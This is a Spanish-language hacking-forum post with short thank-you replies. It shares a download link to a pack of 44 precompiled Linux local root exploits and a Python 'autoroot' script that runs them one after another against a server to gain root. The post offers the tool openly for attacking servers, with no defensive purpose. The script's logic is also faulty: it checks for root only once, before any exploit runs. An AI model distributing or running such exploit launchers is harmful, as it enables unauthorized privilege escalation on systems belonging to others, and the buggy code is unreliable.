Hace un par de dias un amigo me paso 44 local root exploits ya compilados previamente, hay de todo, para kernels, 2007, 2010, 2011, tambien hay algunos priv8 y se los comparto.
Ademas decidi armar un sencillo autoroot en python para lanzarlos.
#!/usr/bin/python
import os
import subprocess
banner= """
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-++-+--------+-+-+-+-+-+-+-+-+-+-+
+ AUTOROOT BY [Q]3rV[0] +
+-+-+-+-+-+-+-+-+--+-+-+-+-+-+-+-+-+-+-+-+-+--+-+
+ By [Q]3rv[0] +
+ Site: http://underterminal.nixiweb.com +
+ Mail: under.terminal[at]gmail[dot]com +
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
"""
print chr(27)+"[1;31m"+ banner
print chr(27)+"[0m"
exploit=0
comando="id"
privs=subprocess.Popen(comando, shell=True, stdout=subprocess.PIPE).stdout.read()
print chr(27)+"[1;31m"+"[*] Cargando Exploit's..."
print chr(27)+"[0m"
while exploit <= 43:
exploit=exploit+1
print chr(27)+"[1;31m"+"[0x"+str(exploit)+"] Corriendo..."
print chr(27)+"[0m"
os.system('./'+str(exploit))
if privs.find('root')!=-1:
print chr(27)+"[4;31m"+"[+GOOD!+] Server R00te3d x Exploit [0x"+str(exploit)+"]"
print chr(27)+"[0m"
break
else:
print chr(27)+"[1;31m"+"[-WRONG!-] El exploit [0x"+str(exploit)+"] no pudo R00tear!"
print chr(27)+"[0m"
Exploit-Pack: http://www.mediafire.com/?6wcuxy59r923mkw
Saludos!
Muy bueno man , habra que echarles un ojo jaja ;)
Gracias :) y suerte
gracias amigo
nice
menudo aporte bro!
no está de más agradecer ;)
gracias q3rv0.